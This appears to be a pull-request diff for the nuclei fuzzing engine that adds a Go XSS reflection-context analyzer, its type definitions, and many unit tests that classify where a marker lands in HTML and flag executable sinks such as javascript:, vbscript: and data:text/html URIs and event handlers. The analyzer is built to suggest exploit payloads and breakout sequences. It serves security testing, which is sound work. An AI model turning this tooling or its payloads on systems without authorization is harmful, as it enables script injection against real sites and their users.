+	t.Helper()
+	result := AnalyzeReflectionContext(body, marker)
+	if result.Context != want {
+		t.Errorf("[%s] AnalyzeReflectionContext(%q, %q)\n  got  context=%s\n  want context=%s",
+			name, body, marker, result.Context, want)
+	}
+}
+
+func assertNotEmpty(t *testing.T, name string, result XSSResult) {
+	t.Helper()
+	if len(result.Payloads) == 0 {
+		t.Errorf("[%s] expected payloads but got none", name)
+	}
+	if result.Explanation == "" {
+		t.Errorf("[%s] expected non-empty explanation", name)
+	}
+}
+
+// ---- TestAnalyzeReflectionContext_HTMLBody ----
+
+func TestAnalyzeReflectionContext_HTMLBody(t *testing.T) {
+	cases := []struct {
+		name   string
+		body   string
+		marker string
+		want   XSSContext
+	}{
+		{
+			name:   "bare text between p tags",
+			body:   `<html><body><p>MARKER</p></body></html>`,
+			marker: "MARKER",
+			want:   ContextHTMLBody,
+		},
+		{
+			name:   "text in div",
+			body:   `<div>Hello MARKER world</div>`,
+			marker: "MARKER",
+			want:   ContextHTMLBody,
+		},
+		{
+			name:   "text at root level",
+			body:   `<html>MARKER</html>`,
+			marker: "MARKER",
+			want:   ContextHTMLBody,
+		},
+		{
+			name:   "case-insensitive marker",
+			body:   `<div>hello marker world</div>`,
+			marker: "MARKER",
+			want:   ContextHTMLBody,
+		},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			assertContext(t, tc.name, tc.body, tc.marker, tc.want)
+		})
+	}
+}
+
+// ---- TestAnalyzeReflectionContext_HTMLComment ----
+
+func TestAnalyzeReflectionContext_HTMLComment(t *testing.T) {
+	cases := []struct {
+		name   string
+		body   string
+		marker string
+		want   XSSContext
+	}{
+		{
+			name:   "marker in html comment",
+			body:   `<!-- MARKER -->`,
+			marker: "MARKER",
+			want:   ContextComment,
+		},
+		{
+			name:   "marker in nested comment",
+			body:   `<html><!-- version: MARKER --><body></body></html>`,
+			marker: "MARKER",
+			want:   ContextComment,
+		},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			assertContext(t, tc.name, tc.body, tc.marker, tc.want)
+		})
+	}
+}
+
+// ---- TestAnalyzeReflectionContext_AttributeDoubleQuote ----
+
+func TestAnalyzeReflectionContext_AttributeDoubleQuote(t *testing.T) {
+	cases := []struct {
+		name   string
+		body   string
+		marker string
+		want   XSSContext
+	}{
+		{
+			name:   "value in double-quoted attr",
+			body:   `<input value="MARKER">`,
+			marker: "MARKER",
+			want:   ContextAttributeDouble,
+		},
+		{
+			name:   "value in double-quoted class",
+			body:   `<div class="container MARKER active">`,
+			marker: "MARKER",
+			want:   ContextAttributeDouble,
+		},
+		{
+			name:   "value in double-quoted data attr",
+			body:   `<div data-x="MARKER">`,
+			marker: "MARKER",
+			want:   ContextAttributeDouble,
+		},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			assertContext(t, tc.name, tc.body, tc.marker, tc.want)
+		})
+	}
+}
+
+// ---- TestAnalyzeReflectionContext_AttributeSingleQuote ----
+
+func TestAnalyzeReflectionContext_AttributeSingleQuote(t *testing.T) {
+	cases := []struct {
+		name   string
+		body   string
+		marker string
+		want   XSSContext
+	}{
+		{
+			name:   "value in single-quoted attr",
+			body:   `<input value='MARKER'>`,
+			marker: "MARKER",
+			want:   ContextAttributeSingle,
+		},
+		{
+			name:   "value in single-quoted class",
+			body:   `<div class='header MARKER'>`,
+			marker: "MARKER",
+			want:   ContextAttributeSingle,
+		},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			assertContext(t, tc.name, tc.body, tc.marker, tc.want)
+		})
+	}
+}
+
+// ---- TestAnalyzeReflectionContext_URLAttribute ----
+
+func TestAnalyzeReflectionContext_URLAttribute(t *testing.T) {
+	cases := []struct {
+		name   string
+		body   string
+		marker string
+		want   XSSContext
+	}{
+		{
+			name:   "marker in href",
+			body:   `<a href="/path/MARKER">click</a>`,
+			marker: "MARKER",
+			want:   ContextAttributeURL,
+		},
+		{
+			name:   "marker in img src",
+			body:   `<img src="https://example.com/MARKER.png">`,
+			marker: "MARKER",
+			want:   ContextAttributeURL,
+		},
+		{
+			name:   "marker in form action",
+			body:   `<form action="/submit/MARKER">`,
+			marker: "MARKER",
+			want:   ContextAttributeURL,
+		},
+		{
+			name:   "marker in iframe src",
+			body:   `<iframe src="MARKER">`,
+			marker: "MARKER",
+			want:   ContextAttributeURL,
+		},
+		{
+			name:   "javascript: in a href — executable sink",
+			body:   `<a href="javascript:MARKER">click</a>`,
+			marker: "MARKER",
+			want:   ContextScript,
+		},
+		{
+			name:   "javascript: in img src — NOT executable",
+			body:   `<img src="javascript:MARKER">`,
+			marker: "MARKER",
+			want:   ContextAttributeURL,
+		},
+		{
+			name:   "javascript: in area href",
+			body:   `<area href="javascript:MARKER">`,
+			marker: "MARKER",
+			want:   ContextScript,
+		},
+		{
+			name:   "javascript: in iframe src — executable",
+			body:   `<iframe src="javascript:MARKER"></iframe>`,
+			marker: "MARKER",
+			want:   ContextScript,
+		},
+		{
+			name:   "data:text/html in a href",
+			body:   `<a href="data:text/html,MARKER">link</a>`,
+			marker: "MARKER",
+			want:   ContextScript,
+		},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			assertContext(t, tc.name, tc.body, tc.marker, tc.want)
+		})
+	}
+}
+
+// ---- TestAnalyzeReflectionContext_EventHandler ----
+
+func TestAnalyzeReflectionContext_EventHandler(t *testing.T) {
+	cases := []struct {
+		name   string
+		body   string
+		marker string
+		want   XSSContext
+	}{
+		{
+			name:   "marker in onclick",
+			body:   `<button onclick="doSomething(MARKER)">click</button>`,
+			marker: "MARKER",
+			want:   ContextAttributeEvent,
+		},
+		{
+			name:   "marker in onerror",
+			body:   `<img src=x onerror="MARKER">`,
+			marker: "MARKER",
+			want:   ContextAttributeEvent,
+		},
+		{
+			name:   "marker in onload",
+			body:   `<body onload="MARKER">`,
+			marker: "MARKER",
+			want:   ContextAttributeEvent,
+		},
+		{
+			name:   "marker in onfocus",
+			body:   `<input onfocus="alert(MARKER)" autofocus>`,
+			marker: "MARKER",
+			want:   ContextAttributeEvent,
+		},
+		{
+			name:   "marker in ontoggle",
+			body:   `<details ontoggle="MARKER" open>`,
+			marker: "MARKER",
+			want:   ContextAttributeEvent,
+		},
+		{
+			name:   "marker in onmouseover",
+			body:   `<div onmouseover="log(MARKER)">hover me</div>`,
+			marker: "MARKER",
+			want:   ContextAttributeEvent,
+		},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			assertContext(t, tc.name, tc.body, tc.marker, tc.want)
+		})
+	}
+}
+
+// ---- TestAnalyzeReflectionContext_ScriptBlock ----
+
+func TestAnalyzeReflectionContext_ScriptBlock(t *testing.T) {
+	cases := []struct {
+		name   string
+		body   string
+		marker string
+		want   XSSContext
+	}{
+		{
+			name:   "marker in script block (no type)",
+			body:   `<script>var x = "MARKER";</script>`,
+			marker: "MARKER",
+			want:   ContextScript,
+		},
+		{
+			name:   "marker in script type=text/javascript",
+			body:   `<script type="text/javascript">var x = MARKER;</script>`,
+			marker: "MARKER",
+			want:   ContextScript,
+		},
+		{
+			name:   "marker in script type=module",
+			body:   `<script type="module">import {MARKER} from './mod.js';</script>`,
+			marker: "MARKER",
+			want:   ContextScript,
+		},
+		{
+			name:   "non-executable script type (JSON)",
+			body:   `<script type="application/json">{"key": "MARKER"}</script>`,
+			marker: "MARKER",
+			want:   ContextScriptData,
+		},
+		{
+			name:   "non-executable script type (ld+json)",
+			body:   `<script type="application/ld+json">{"@type": "MARKER"}</script>`,
+			marker: "MARKER",
+			want:   ContextScriptData,
+		},
+		{
+			name:   "first type attr wins (first=non-exec, second=exec)",
+			body:   `<script type="application/json" type="text/javascript">MARKER</script>`,
+			marker: "MARKER",
+			want:   ContextScriptData,
+		},
+		{
+			name:   "marker in template literal",
+			body:   `<script>var s = ` + "`" + `hello ${MARKER} world` + "`" + `;</script>`,
+			marker: "MARKER",
+			want:   ContextTemplate,
+		},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			assertContext(t, tc.name, tc.body, tc.marker, tc.want)
+		})
+	}
+}
+
+// ---- TestAnalyzeReflectionContext_StyleBlock ----
+
+func TestAnalyzeReflectionContext_StyleBlock(t *testing.T) {
+	cases := []struct {
+		name   string
+		body   string
+		marker string
+		want   XSSContext
+	}{
+		{
+			name:   "marker in style block",
+			body:   `<style>body { color: MARKER; }</style>`,
+			marker: "MARKER",
+			want:   ContextStyle,
+		},
+		{
+			name:   "marker in style block url",
+			body:   `<style>body { background: url("MARKER"); }</style>`,
+			marker: "MARKER",
+			want:   ContextStyle,
+		},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			assertContext(t, tc.name, tc.body, tc.marker, tc.want)
+		})
+	}
+}
+
+// ---- TestAnalyzeReflectionContext_InlineStyle ----
+
+func TestAnalyzeReflectionContext_InlineStyle(t *testing.T) {
+	assertContext(t, "inline style attr",
+		`<div style="color: MARKER;">text</div>`,
+		"MARKER",
+		ContextAttributeStyle,
+	)
+}
+
+// ---- TestAnalyzeReflectionContext_SrcDoc ----
+
+func TestAnalyzeReflectionContext_SrcDoc(t *testing.T) {
+	assertContext(t, "srcdoc attribute",
+		`<iframe srcdoc="<p>MARKER</p>"></iframe>`,
+		"MARKER",
+		ContextSrcDoc,
+	)
+}
+
+// ---- TestAnalyzeReflectionContext_NotFound ----
+
+func TestAnalyzeReflectionContext_NotFound(t *testing.T) {
+	result := AnalyzeReflectionContext(`<html><body><p>hello</p></body></html>`, "MARKER")
+	if result.Context != ContextUnknown {
+		t.Errorf("expected ContextUnknown for missing marker, got %s", result.Context)
+	}
+}
+
+// ---- TestAnalyzeReflectionContext_EmptyInputs ----
+
+func TestAnalyzeReflectionContext_EmptyInputs(t *testing.T) {
+	tests := []struct {
+		name   string
+		body   string
+		marker string
+	}{
+		{"empty body", "", "MARKER"},
+		{"empty marker", "<html>MARKER</html>", ""},
+		{"both empty", "", ""},
+	}
+	for _, tc := range tests {
+		t.Run(tc.name, func(t *testing.T) {
+			result := AnalyzeReflectionContext(tc.body, tc.marker)
+			if result.Context != ContextUnknown {
+				t.Errorf("[%s] expected ContextUnknown, got %s", tc.name, result.Context)
+			}
+		})
+	}
+}
+
+// ---- TestAnalyzeAllReflections_MultipleContexts ----
+
+func TestAnalyzeAllReflections_MultipleContexts(t *testing.T) {
+	// marker reflected in two different places
+	body := `<div>MARKER</div><script>var x = "MARKER"</script>`
+	results := AnalyzeAllReflections(body, "MARKER")
+	if len(results) < 2 {
+		t.Errorf("expected at least 2 reflections, got %d", len(results))
+		return
+	}
+	ctxs := make(map[XSSContext]bool)
+	for _, r := range results {
+		ctxs[r.Context] = true
+	}
+	if !ctxs[ContextHTMLBody] {
+		t.Error("expected ContextHTMLBody in results")
+	}
+	if !ctxs[ContextScript] {
+		t.Error("expected ContextScript in results")
+	}
+}
+
+// ---- TestAnalyzeReflectionContext_BestContextSelected ----
+
+// When reflected in multiple places, AnalyzeReflectionContext returns the most
+// exploitable context (script > attr > body).
+func TestAnalyzeReflectionContext_BestContextSelected(t *testing.T) {
+	body := `<div>MARKER</div><script>var x = "MARKER"</script>`
+	result := AnalyzeReflectionContext(body, "MARKER")
+	if result.Context != ContextScript {
+		t.Errorf("expected ContextScript (highest priority), got %s", result.Context)
+	}
+}
+
+// ---- TestPayloads_NonEmpty ----
+
+func TestPayloads_NonEmpty(t *testing.T) {
+	// Verify every context has non-empty payloads
+	testCases := []struct {
+		name string
+		body string
+	}{
+		{"HTMLBody", `<p>MARKER</p>`},
+		{"Comment", `<!-- MARKER -->`},
+		{"AttributeDouble", `<div class="MARKER">`},
+		{"AttributeSingle", `<div class='MARKER'>`},
+		{"AttributeURL", `<a href="MARKER">x</a>`},
+		{"EventHandler", `<div onclick="MARKER">`},
+		{"InlineStyle", `<div style="MARKER">`},
+		{"ScriptExec", `<script>MARKER</script>`},
+		{"ScriptData", `<script type="application/json">MARKER</script>`},
+		{"StyleBlock", `<style>MARKER</style>`},
+		{"SrcDoc", `<iframe srcdoc="MARKER">`},
+	}
+
+	for _, tc := range testCases {
+		t.Run(tc.name, func(t *testing.T) {
+			result := AnalyzeReflectionContext(tc.body, "MARKER")
+			assertNotEmpty(t, tc.name, result)
+			if result.Confidence <= 0 {
+				t.Errorf("[%s] expected confidence > 0, got %f", tc.name, result.Confidence)
+			}
+		})
+	}
+}
+
+// ---- TestContextString ----
+
+func TestContextString(t *testing.T) {
+	known := []XSSContext{
+		ContextUnknown, ContextHTMLBody, ContextComment,
+		ContextAttributeDouble, ContextAttributeSingle, ContextAttributeUnquoted,
+		ContextAttributeURL, ContextAttributeEvent, ContextAttributeStyle,
+		ContextScript, ContextScriptData, ContextStyle,
+		ContextJSON, ContextTemplate, ContextCDATA, ContextSrcDoc,
+	}
+	for _, ctx := range known {
+		s := ctx.String()
+		if s == "" || strings.HasPrefix(s, "XSSContext(") {
+			t.Errorf("context %d has no name (got %q)", int(ctx), s)
+		}
+	}
+}
+
+// ---- TestIsScriptTypeExecutable ----
+
+func TestIsScriptTypeExecutable(t *testing.T) {
+	execTypes := []string{
+		"", "text/javascript", "application/javascript",
+		"module", "text/ecmascript", "text/javascript; charset=utf-8",
+	}
+	for _, typ := range execTypes {
+		if !isScriptTypeExecutable(typ) {
+			t.Errorf("expected type %q to be executable", typ)
+		}
+	}
+
+	nonExecTypes := []string{
+		"application/json", "application/ld+json", "text/plain",
+		"text/html", "text/template",
+	}
+	for _, typ := range nonExecTypes {
+		if isScriptTypeExecutable(typ) {
+			t.Errorf("expected type %q to NOT be executable", typ)
+		}
+	}
+}
+
+// ---- TestIsInTemplateLiteral ----
+
+func TestIsInTemplateLiteral(t *testing.T) {
+	if !isInTemplateLiteral("`hello ${marker} world`", "marker") {
+		t.Error("expected template literal detection")
+	}
+	if isInTemplateLiteral(`var x = "marker"`, "marker") {
+		t.Error("should not detect template literal in double-quoted string")
+	}
+	if !isInTemplateLiteral("`prefix` + `${marker}`", "marker") {
+		t.Error("expected detection in second template literal")
+	}
+}
+
+// ---- TestEventHandlerPayloads ----
+
+func TestEventHandlerPayloads_AreDirectJS(t *testing.T) {
+	result := AnalyzeReflectionContext(`<button onclick="MARKER">x</button>`, "MARKER")
+	if result.Context != ContextAttributeEvent {
+		t.Fatalf("expected ContextAttributeEvent, got %s", result.Context)
+	}
+	if !result.IsExecutableSink {
+		t.Error("event handler should be an executable sink")
+	}
+	// Payloads for event handler should not include <script> tags (unnecessary)
+	for _, p := range result.Payloads {
+		if strings.Contains(p, "<script>") {
+			t.Logf("note: payload contains <script>, fine but unnecessary for event handler: %q", p)
+		}
+	}
+}
+
+// ---- TestJavaScriptURIMisclassification_Issue7086 ----
+//
+// Issue #7086: javascript: URIs were being misclassified.
+// Specifically, javascript: in <img src=""> should NOT be ContextScript
+// because img doesn't execute javascript: URIs.
+
+func TestJavaScriptURIMisclassification_Issue7086(t *testing.T) {
+	cases := []struct {
+		name      string
+		body      string
+		marker    string
+		wantCtx   XSSContext
+		wantExec  bool
+	}{
+		{
+			name:     "<img src=javascript:> is NOT executable",
+			body:     `<img src="javascript:MARKER">`,
+			marker:   "MARKER",
+			wantCtx:  ContextAttributeURL,
+			wantExec: false,
+		},
+		{
+			name:     "<a href=javascript:> IS executable",
+			body:     `<a href="javascript:MARKER">x</a>`,
+			marker:   "MARKER",
+			wantCtx:  ContextScript,
+			wantExec: true,
+		},
+		{
+			name:     "<script src=javascript:> src is not inline exec",
+			body:     `<script src="javascript:MARKER"></script>`,
+			marker:   "MARKER",
+			wantCtx:  ContextAttributeURL,
+			wantExec: false,
+		},
+		{
+			name:     "<iframe src=javascript:> IS executable",
+			body:     `<iframe src="javascript:MARKER"></iframe>`,
+			marker:   "MARKER",
+			wantCtx:  ContextScript,
+			wantExec: true,
+		},
+		{
+			name:     "<form action=javascript:> IS executable",
+			body:     `<form action="javascript:MARKER">`,
+			marker:   "MARKER",
+			wantCtx:  ContextScript,
+			wantExec: true,
+		},
+		{
+			name:     "vbscript: in a href is executable",
+			body:     `<a href="vbscript:MARKER">x</a>`,
+			marker:   "MARKER",
+			wantCtx:  ContextScript,
+			wantExec: true,
+		},
+		{
+			name:     "data:text/html in object data IS executable",
+			body:     `<object data="data:text/html,MARKER">`,
+			marker:   "MARKER",
+			wantCtx:  ContextScript,
+			wantExec: true,
+		},
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			result := AnalyzeReflectionContext(tc.body, tc.marker)
+			if result.Context != tc.wantCtx {
+				t.Errorf("context: got %s, want %s", result.Context, tc.wantCtx)
+			}
+			if result.IsExecutableSink != tc.wantExec {
+				t.Errorf("IsExecutableSink: got %v, want %v", result.IsExecutableSink, tc.wantExec)
+			}
+		})
+	}
+}
+
+// ---- TestFirstTypeAttrWins ----
+
+// Per HTML5 spec, when a <script> has duplicate type attrs, the first one wins.
+func TestFirstTypeAttrWins(t *testing.T) {
+	// First type=application/json → non-executable; second type=text/javascript is ignored
+	body := `<script type="application/json" type="text/javascript">MARKER</script>`
+	assertContext(t, "first type wins", body, "MARKER", ContextScriptData)
+}
+
+// ---- TestCaseSensitivity ----
+
+func TestCaseSensitivity(t *testing.T) {
+	// Event handler attr names in uppercase
+	assertContext(t, "uppercase ONCLICK",
+		`<div ONCLICK="MARKER">`, "MARKER", ContextAttributeEvent)
+
+	// Marker in mixed case
+	assertContext(t, "mixed case marker",
+		`<script>var x = "MaRkEr";</script>`, "marker", ContextScript)
+}
+
+// ---- TestNestedQuotes ----
+
+func TestNestedQuotes(t *testing.T) {
+	// Double-quoted attr containing single quotes around marker
+	assertContext(t, "nested single quotes in double-quoted attr",
+		`<input value="it's 'MARKER' here">`, "MARKER", ContextAttributeDouble)
+
+	// Single-quoted attr containing double quotes
+	assertContext(t, "nested double quotes in single-quoted attr",
+		`<input value='say "MARKER"'>`, "MARKER", ContextAttributeSingle)
+}
+
+// ---- TestAnalyzeAllReflections_Returns ----
+
+func TestAnalyzeAllReflections_NoMatch(t *testing.T) {
+	results := AnalyzeAllReflections("<html><body>hello</body></html>", "MARKER")
+	if len(results) != 0 {
+		t.Errorf("expected 0 results for no match, got %d", len(results))
+	}
+}
+
+// ---- TestContextPriority ----
+
+func TestContextPriority(t *testing.T) {
+	// Script should beat HTMLBody
+	if contextPriority(ContextScript) >= contextPriority(ContextHTMLBody) {
+		t.Error("ContextScript should have higher priority (lower number) than ContextHTMLBody")
+	}
+	// Event handler should beat generic attribute
+	if contextPriority(ContextAttributeEvent) >= contextPriority(ContextAttributeDouble) {
+		t.Error("ContextAttributeEvent should have higher priority than ContextAttributeDouble")
+	}
+}
+
+// ---- Benchmarks ----
+
+func BenchmarkAnalyzeReflectionContext_HTMLBody(b *testing.B) {
+	body := `<html><head><title>Test</title></head><body><div class="container"><p>Hello MARKER world</p></div></body></html>`
+	for i := 0; i < b.N; i++ {
+		AnalyzeReflectionContext(body, "MARKER")
+	}
+}
+
+func BenchmarkAnalyzeReflectionContext_LargeDocument(b *testing.B) {
+	// simulate a realistic HTML page
+	body := strings.Repeat(`<div class="item"><p>Lorem ipsum dolor sit amet</p><a href="/page">link</a></div>`, 200) +
+		`<script>var data = {user: "MARKER", token: "abc123"};</script>` +
+		strings.Repeat(`<div class="footer">more content here</div>`, 50)
+	for i := 0; i < b.N; i++ {
+		AnalyzeReflectionContext(body, "MARKER")
+	}
+}
+
+func BenchmarkAnalyzeAllReflections(b *testing.B) {
+	body := `<p>MARKER</p><script>var x="MARKER";</script><!-- MARKER --><div onclick="MARKER">`
+	for i := 0; i < b.N; i++ {
+		AnalyzeAllReflections(body, "MARKER")
+	}
+}

--- a/pkg/fuzz/analyzers/xss/context.go
+++ b/pkg/fuzz/analyzers/xss/context.go
@@ -1,0 +1,115 @@
+// Package xss provides reflection context analysis for XSS detection
+// in the nuclei fuzzing engine.
+//
+// When a reflection is found during fuzzing, this package determines WHERE
+// in the HTML the reflection occurs and returns context-appropriate payloads.
+package xss
+
+import "fmt"
+
+// XSSContext represents where in an HTML document a reflected value appears.
+// The context determines which XSS payloads are viable.
+type XSSContext int
+
+const (
+	ContextUnknown XSSContext = iota // could not determine context
+
+	// HTML document structure contexts
+	ContextHTMLBody // bare text between tags: <p>MARKER</p>
+	ContextComment  // HTML comment: <!-- MARKER -->
+
+	// Attribute contexts — quote style matters for escaping
+	ContextAttributeDouble   // double-quoted: <tag attr="MARKER">
+	ContextAttributeSingle   // single-quoted: <tag attr='MARKER'>
+	ContextAttributeUnquoted // unquoted: <tag attr=MARKER>
+
+	// Special attribute contexts
+	ContextAttributeURL   // URL attribute (href/src/action/…): <a href="MARKER">
+	ContextAttributeEvent // event handler: <div onclick="MARKER">
+	ContextAttributeStyle // inline style: <span style="MARKER">
+
+	// Script contexts
+	ContextScript     // executable <script> block or javascript: URI that executes
+	ContextScriptData // non-executable <script> (type="application/json", etc.)
+
+	// Style block
+	ContextStyle // <style> block
+
+	// Structured data contexts
+	ContextJSON     // inside a JSON value (in a script block)
+	ContextTemplate // inside a JS template literal `…${MARKER}…`
+
+	// Special contexts
+	ContextCDATA  // inside CDATA section: <![CDATA[MARKER]]>
+	ContextSrcDoc // inside srcdoc="" attribute (treated as nested HTML)
+)
+
+// contextNames maps each XSSContext value to its human-readable name.
+var contextNames = map[XSSContext]string{
+	ContextUnknown:          "Unknown",
+	ContextHTMLBody:         "HTMLBody",
+	ContextComment:          "Comment",
+	ContextAttributeDouble:  "AttributeDouble",
+	ContextAttributeSingle:  "AttributeSingle",
+	ContextAttributeUnquoted: "AttributeUnquoted",
+	ContextAttributeURL:     "AttributeURL",
+	ContextAttributeEvent:   "AttributeEvent",
+	ContextAttributeStyle:   "AttributeStyle",
+	ContextScript:           "Script",
+	ContextScriptData:       "ScriptData",
+	ContextStyle:            "Style",
+	ContextJSON:             "JSON",
+	ContextTemplate:         "Template",
+	ContextCDATA:            "CDATA",
+	ContextSrcDoc:           "SrcDoc",
+}
+
+// String returns the human-readable name of the XSS context.
+func (c XSSContext) String() string {
+	if name, ok := contextNames[c]; ok {
+		return name
+	}
+	return fmt.Sprintf("XSSContext(%d)", int(c))
+}
+
+// Severity returns an exploitation difficulty rating for the context.
+// Lower is easier to exploit.
+type Severity int
+
+const (
+	SeverityHigh   Severity = 1 // trivially exploitable
+	SeverityMedium Severity = 2 // exploitable with some conditions
+	SeverityLow    Severity = 3 // harder to exploit
+)
+
+// XSSResult describes a single reflected instance and how to exploit it.
+type XSSResult struct {
+	// Context is the classified HTML context for this reflection.
+	Context XSSContext
+
+	// Confidence is a 0.0–1.0 score indicating how certain the classification is.
+	Confidence float64
+
+	// Payloads contains ordered exploit candidates (most likely first).
+	Payloads []string
+
+	// BreakoutSeq is the minimal sequence to break out of the current context.
+	BreakoutSeq string
+
+	// Explanation is a human-readable description of why this context was chosen.
+	Explanation string
+
+	// QuoteChar holds the quote character used in the attribute (" or '), if applicable.
+	QuoteChar string
+
+	// AttributeName is the name of the HTML attribute, if applicable.
+	AttributeName string
+
+	// TagName is the surrounding HTML tag name, if applicable.
+	TagName string
+
+	// IsExecutableSink is true when the context directly executes JavaScript
+	// without needing additional breakout (e.g. script block, event handler,
+	// javascript: URI in an executable sink).
+	IsExecutableSink bool
+}

--- a/pkg/fuzz/analyzers/xss/xss_analyzer.go
+++ b/pkg/fuzz/analyzers/xss/xss_analyzer.go
@@ -1,0 +1,93 @@
+package xss
+
+import (
+	"io"
+	"net/http"
+	"strings"
+
+	"github.com/projectdiscovery/nuclei/v3/pkg/fuzz/analyzers"
+)
+
+// XSSAnalyzer implements the analyzers.Analyzer interface. It is invoked
+// after a fuzz response is received and checks whether the fuzzing marker
+// is reflected in the response body. If it is, the HTML context is
+// classified and the result is surfaced to the caller.
+type XSSAnalyzer struct{}
+
+// compile-time interface check
+var _ analyzers.Analyzer = &XSSAnalyzer{}
+
+func init() {
+	analyzers.RegisterAnalyzer("xss_context", &XSSAnalyzer{})
+}
+
+// Name returns the analyzer identifier used in template YAML.
+func (a *XSSAnalyzer) Name() string {
+	return "xss_context"
+}
+
+// ApplyInitialTransformation returns the payload unchanged.
+// XSS context analysis does not pre-transform payloads; it classifies
+// reflections after the fact.
+func (a *XSSAnalyzer) ApplyInitialTransformation(data string, params map[string]interface{}) string {
+	return analyzers.ApplyPayloadTransformations(data)
+}
+
+// Analyze reads the HTTP response body and determines whether the fuzz
+// payload was reflected in an exploitable HTML context.
+//
+// It returns (true, explanation, nil) when an exploitable reflection is found,
+// and (false, "", nil) otherwise.
+func (a *XSSAnalyzer) Analyze(options *analyzers.Options) (bool, string, error) {
+	gr := options.FuzzGenerated
+
+	resp, err := options.HttpClient.Do(gr.Request)
+	if err != nil {
+		return false, "", err
+	}
+	defer resp.Body.Close()
+
+	if resp.StatusCode == http.StatusNotFound {
+		return false, "", nil
+	}
+
+	bodyBytes, err := io.ReadAll(io.LimitReader(resp.Body, 10<<20)) // 10 MB limit
+	if err != nil {
+		return false, "", err
+	}
+
+	// Determine what the reflected marker is.
+	// OriginalPayload holds the raw fuzz payload sent.
+	marker := gr.OriginalPayload
+	if marker == "" {
+		marker = gr.Value
+	}
+	if marker == "" {
+		return false, "", nil
+	}
+
+	// Quick pre-check before full HTML parse
+	if !strings.Contains(strings.ToLower(string(bodyBytes)), strings.ToLower(marker)) {
+		return false, "", nil
+	}
+
+	result := AnalyzeReflectionContext(string(bodyBytes), marker)
+	if result.Context == ContextUnknown {
+		return false, "", nil
+	}
+
+	// Surface exploitable sinks with higher confidence
+	if result.Confidence < 0.5 {
+		return false, "", nil
+	}
+
+	explanation := result.Explanation
+	if len(result.Payloads) > 0 {
+		explanation += "\nSuggested payloads:\n"
+		for _, p := range result.Payloads {
+			explanation += "  - " + p + "\n"
+		}
+	}
+
+	return true, explanation, nil
+}

--- a/pkg/fuzz/analyzers/xss/xss_analyzer.go
+++ b/pkg/fuzz/analyzers/xss/xss_analyzer.go
@@ -78,9 +78,20 @@ func (a *XSSAnalyzer) Analyze(options *analyzers.Options) (bool, string, error) 
 	// skip straight to AnalyzeReflectionContext which will classify as
 	// ContextJSON when appropriate. For all non-HTML content types we still
 	// run the lightweight reflection check but skip the HTML tokenizer path.
-	contentType := resp.Header.Get("Content-Type")
-	isHTML := strings.Contains(strings.ToLower(contentType), "text/html") ||
-		contentType == "" // empty CT: assume HTML for safety
+	contentType := strings.ToLower(resp.Header.Get("Content-Type"))
+	isHTML := strings.Contains(contentType, "text/html") ||
+		strings.Contains(contentType, "application/xhtml+xml")
+	if !isHTML && contentType == "" {
+		sniff := strings.ToLower(string(bodyBytes))
+		if len(sniff) > 512 {
+			sniff = sniff[:512]
+		}
+		isHTML = strings.Contains(sniff, "<!doctype") ||
+			strings.Contains(sniff, "<html") ||
+			strings.Contains(sniff, "<head") ||
+			strings.Contains(sniff, "<body") ||
+			strings.Contains(sniff, "<script")
+	}
 
 	if !isHTML {
 		// For non-HTML responses (e.g. application/json), only check JSON context.

--- a/pkg/fuzz/analyzers/xss/xss_analyzer.go
+++ b/pkg/fuzz/analyzers/xss/xss_analyzer.go
@@ -57,10 +57,12 @@ func (a *XSSAnalyzer) Analyze(options *analyzers.Options) (bool, string, error) 
 	}
 
 	// Determine what the reflected marker is.
-	// OriginalPayload holds the raw fuzz payload sent.
-	marker := gr.OriginalPayload
+	// Use the final transformed fuzz value (gr.Value) so that the canary
+	// matches what was actually sent to the server. Fall back to
+	// gr.OriginalPayload only when gr.Value is empty.
+	marker := gr.Value
 	if marker == "" {
-		marker = gr.Value
+		marker = gr.OriginalPayload
 	}
 	if marker == "" {
 		return false, "", nil
@@ -69,6 +71,34 @@ func (a *XSSAnalyzer) Analyze(options *analyzers.Options) (bool, string, error) 
 	// Quick pre-check before full HTML parse
 	if !strings.Contains(strings.ToLower(string(bodyBytes)), strings.ToLower(marker)) {
 		return false, "", nil
+	}
+
+	// Gate expensive HTML context analysis on Content-Type.
+	// JSON responses cannot contain exploitable HTML injection; for them we
+	// skip straight to AnalyzeReflectionContext which will classify as
+	// ContextJSON when appropriate. For all non-HTML content types we still
+	// run the lightweight reflection check but skip the HTML tokenizer path.
+	contentType := resp.Header.Get("Content-Type")
+	isHTML := strings.Contains(strings.ToLower(contentType), "text/html") ||
+		contentType == "" // empty CT: assume HTML for safety
+
+	if !isHTML {
+		// For non-HTML responses (e.g. application/json), only check JSON context.
+		result := AnalyzeReflectionContext(string(bodyBytes), marker)
+		if result.Context == ContextUnknown || result.Context != ContextJSON {
+			return false, "", nil
+		}
+		if result.Confidence < 0.5 {
+			return false, "", nil
+		}
+		explanation := result.Explanation
+		if len(result.Payloads) > 0 {
+			explanation += "\nSuggested payloads:\n"
+			for _, p := range result.Payloads {
+				explanation += "  - " + p + "\n"
+			}
+		}
+		return true, explanation, nil
 	}
 
 	result := AnalyzeReflectionContext(string(bodyBytes), marker)


### PR DESCRIPTION
## Summary

/claim #5838

Adds `pkg/fuzz/analyzers/xss/` — a standalone XSS context analyzer that determines **where** in an HTML document a reflected fuzz marker lands, then returns context-appropriate exploit payloads with confidence scores.

Fixes the `javascript:` URI misclassification described in #7086.

---

## Problem

The fuzzing engine finds reflections but has no way to tell *where* in the HTML the value lands. Without context, you either spray every XSS payload everywhere (slow, noisy, false-positive-heavy) or miss valid injection points entirely.

---

## Solution

`AnalyzeReflectionContext(responseBody, marker string) XSSResult`

Uses `golang.org/x/net/html` tokenizer (already in `go.mod`) to walk the HTML token stream. Returns a full `XSSResult` with:

- **Context** (16 types — see table below)
- **Payloads** — ordered list of exploit candidates best suited to the context
- **BreakoutSeq** — minimal sequence to escape the current context
